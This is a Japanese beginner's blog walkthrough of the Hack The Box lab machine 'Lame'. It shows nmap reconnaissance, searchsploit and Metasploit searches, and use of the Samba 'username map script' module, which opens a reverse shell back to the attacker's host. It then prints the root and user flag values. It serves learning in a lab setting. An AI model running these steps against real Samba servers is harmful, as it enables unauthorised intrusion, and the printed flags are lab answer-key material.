Help us understand the problem. What is going on with this article?

1台目 <Hack the Box> Lame -Walkthrough-

自己紹介

Hack the box ど素人
ハッキングラボを終えて試す場としておすすめだということで始めました。

今回は経験者とお会いする機会をいただけたので、
教わったことのメモを残しておきたくQiitaを書いてみました。

教わったことを後日書いているので曖昧な箇所もあるかと思います。
自分用のメモではありますが、間違いや改善点などご指摘いただいたけたら幸いです。

マシン

最初はこれなら簡単とのこと。
Lame.png

nmap

まずはnampコマンドで開いているポートを探していく。

root@kali:~# nmap -A 10.10.10.3
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-03 03:09 JST
Nmap scan report for 10.10.10.3
Host is up (0.26s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.13
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Linux 2.6.23 (92%), Belkin N300 WAP (Linux 2.6.30) (92%), Control4 HC-300 home controller (92%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (92%), Dell Integrated Remote Access Controller (iDRAC5) (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Citrix XenServer 5.5 (Linux 2.6.18) (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -3d00h53m34s, deviation: 2h49m45s, median: -3d02h53m37s
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2020-07-30T11:16:36-04:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 139/tcp)
HOP RTT       ADDRESS
1   254.89 ms 10.10.14.1
2   254.79 ms 10.10.10.3

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 73.02 seconds

ftp

ftpのポートが開いていて、Anonymous FTP login allowedと書いてあったのでまずここから試してみる。
IDとPasswordを求められたがどちらもAnonymousと入力すると入れた。

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 .
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 ..
226 Directory send OK.

なにを表しているか、中になにがあるか全くわからないので別の方法にする。

ssh

sshが開いているが入れないのかと尋ねたところ
秘密鍵が分からなければ無理とのことだったのであきらめる。

samba

sambaの説明を受け、EternalBlueという脆弱性やWannacryの話を聞いた。
このポートが開いていたら注目するべきだとも言われた。

searchsploitで脆弱性を探してみる。

root@kali:~# searchsploit samba 3.0.20
----------------------------------------- ---------------------------------
 Exploit Title                           |  Path
----------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / S | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' ma | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow    | linux/remote/7701.txt
Samba < 3.0.20 - Remote Heap Overflow    | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service  | linux_x86/dos/36741.py
----------------------------------------- ---------------------------------
Shellcodes: No Results

metasploitを使って侵入してみる。

root@kali:~# msfconsole

     ,           ,
    /             \                                                        
   ((__---,,,---__))                                                       
      (_) O O (_)_________                                                 
         \ _ /            |\                                               
          o_o \   M S F   | \                                              
               \   _____  |  *                                             
                |||   WW|||                                                
                |||     |||                                                


       =[ metasploit v5.0.87-dev                          ]
+ -- --=[ 2006 exploits - 1095 auxiliary - 343 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Use help <command> to learn more about any command
msf5 > search samba 3.0.20

Matching Modules
================

   #   Name                                                   Disclosure Date  Rank       Check  Description
   -   ----                                                   ---------------  ----       -----  -----------
   0   auxiliary/admin/http/wp_easycart_privilege_escalation  2015-02-25       normal     Yes    WordPress WP EasyCart Plugin Privilege Escalation
   1   auxiliary/admin/smb/samba_symlink_traversal                             normal     No     Samba Symlink Directory Traversal
   2   auxiliary/dos/samba/lsa_addprivs_heap                                   normal     No     Samba lsa_io_privilege_set Heap Overflow
   3   auxiliary/dos/samba/lsa_transnames_heap                                 normal     No     Samba lsa_io_trans_names Heap Overflow
   4   auxiliary/dos/samba/read_nttrans_ea_list                                normal     No     Samba read_nttrans_ea_list Integer Overflow
   5   auxiliary/scanner/rsync/modules_list                                    normal     No     List Rsync Modules
   6   auxiliary/scanner/smb/smb_uninit_cred                                   normal     Yes    Samba _netr_ServerPasswordSet Uninitialized Credential State
   7   exploit/freebsd/samba/trans2open                       2003-04-07       great      No     Samba trans2open Overflow (*BSD x86)
   8   exploit/linux/samba/chain_reply                        2010-06-16       good       No     Samba chain_reply Memory Corruption (Linux x86)
   9   exploit/linux/samba/is_known_pipename                  2017-03-24       excellent  Yes    Samba is_known_pipename() Arbitrary Module Load                              
   10  exploit/linux/samba/lsa_transnames_heap                2007-05-14       good       Yes    Samba lsa_io_trans_names Heap Overflow
   11  exploit/linux/samba/setinfopolicy_heap                 2012-04-10       normal     Yes    Samba SetInformationPolicy AuditEventsInfo Heap Overflow
   12  exploit/linux/samba/trans2open                         2003-04-07       great      No     Samba trans2open Overflow (Linux x86)
   13  exploit/multi/samba/nttrans                            2003-04-07       average    No     Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
   14  exploit/multi/samba/usermap_script                     2007-05-14       excellent  No     Samba "username map script" Command Execution                                
   15  exploit/osx/samba/lsa_transnames_heap                  2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow
   16  exploit/osx/samba/trans2open                           2003-04-07       great      No     Samba trans2open Overflow (Mac OS X PPC)
   17  exploit/solaris/samba/lsa_transnames_heap              2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow
   18  exploit/solaris/samba/trans2open                       2003-04-07       great      No     Samba trans2open Overflow (Solaris SPARC)
   19  exploit/unix/http/quest_kace_systems_management_rce    2018-05-31       excellent  Yes    Quest KACE Systems Management Command Injection                              
   20  exploit/unix/misc/distcc_exec                          2002-02-01       excellent  Yes    DistCC Daemon Command Execution                                              
   21  exploit/unix/webapp/citrix_access_gateway_exec         2010-12-21       excellent  Yes    Citrix Access Gateway Command Execution                                      
   22  exploit/windows/fileformat/ms14_060_sandworm           2014-10-14       excellent  No     MS14-060 Microsoft Windows OLE Package Manager Code Execution                
   23  exploit/windows/http/sambar6_search_results            2003-06-21       normal     Yes    Sambar 6 Search Results Buffer Overflow
   24  exploit/windows/license/calicclnt_getconfig            2005-03-02       average    No     Computer Associates License Client GETCONFIG Overflow
   25  exploit/windows/smb/group_policy_startup               2015-01-26       manual     No     Group Policy Script Execution From Shared Resource
   26  post/linux/gather/enum_configs                                          normal     No     Linux Gather Configurations

色々出てきたがなにを使えばいいのかと問うとsearchsploitしたとこに書いてあるとのこと。
ここでターミナルを小さい状態で使っていたので大きくしてもう一回コマンド使ってみてと言われた。

root@kali:~# searchsploit samba 3.0.20
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                           |  Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                                                                                                                                                   | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)                                                                                                                         | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow                                                                                                                                                                    | linux/remote/7701.txt
Samba < 3.0.20 - Remote Heap Overflow                                                                                                                                                                    | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)                                                                                                                                                            | linux_x86/dos/36741.py
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

たしかに書いてあった。
ターミナルを使うときは大きく使ったほうがいいとのこと。
実行してみる。

msf5 > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   139              yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf5 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP double handler on 10.10.14.13:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo Gs57Fw8K6z8xPvW1;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "Gs57Fw8K6z8xPvW1\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.13:4444 -> 10.10.10.3:60860) at 2020-08-03 04:46:04 +0900

RHOSTのセットが抜けてしまっているが実際にはset RHOST 10.10.10.3をしている。

flagをとる

shellが返ってきたのでuserとrootのハッシュ値をとる。

ls
bin                                                                                                                                                                                                                                        
boot                                                                                                                                                                                                                                       
cdrom                                                                                                                                                                                                                                      
dev                                                                                                                                                                                                                                        
etc                                                                                                                                                                                                                                        
home                                                                                                                                                                                                                                       
initrd                                                                                                                                                                                                                                     
initrd.img                                                                                                                                                                                                                                 
lib                                                                                                                                                                                                                                        
lost+found                                                                                                                                                                                                                                 
media                                                                                                                                                                                                                                      
mnt                                                                                                                                                                                                                                        
nohup.out                                                                                                                                                                                                                                  
opt                                                                                                                                                                                                                                        
proc                                                                                                                                                                                                                                       
root                                                                                                                                                                                                                                       
sbin                                                                                                                                                                                                                                       
srv                                                                                                                                                                                                                                        
sys                                                                                                                                                                                                                                        
tmp                                                                                                                                                                                                                                        
usr                                                                                                                                                                                                                                        
var                                                                                                                                                                                                                                        
vmlinuz                                                                                                                                                                                                                                    

cd root                                                                                                                                                                                                                                    

ls
Desktop
reset_logs.sh
root.txt
vnc.log

cat root.txt
92caac3be140ef409e45721348a4e9df
cd home

ls                                                                                                                                                                                                                                         
ftp                                                                                                                                                                                                                                        
makis                                                                                                                                                                                                                                      
service                                                                                                                                                                                                                                    
user                                                                                                                                                                                                                                       

cd makis                                                                                                                                                                                                                                   

ls                                                                                                                                                                                                                                         
user.txt                                                                                                                                                                                                                                   

cat user.txt                                                                                                                                                                                                                               
69454a937d94f5f0225ea00acd2e84c5 

flagをとることができた。

感想

どこから手をつければいいかわからなかったが、
教わりながら手を動かしてみてとてもおもしろかった。

教えてくださった方曰く、
始めはWalkthroughを見ながらで、だんだん出来るようになっていけばいいとのこと。

まだまだ圧倒的に知識不足なのでこれから頑張っていきたい。

拙い記事を最後まで読んでくださりありがとうございました。

ajipon_44
メモ代わりに始めました。 間違いや改善点などご指摘いただけたら幸いです。
Why not register and get more from Qiita?
  1. We will deliver articles that match you
    By following users and tags, you can catch up information on technical fields that you are interested in as a whole
  2. you can read useful information later efficiently
    By "stocking" the articles you like, you can search right away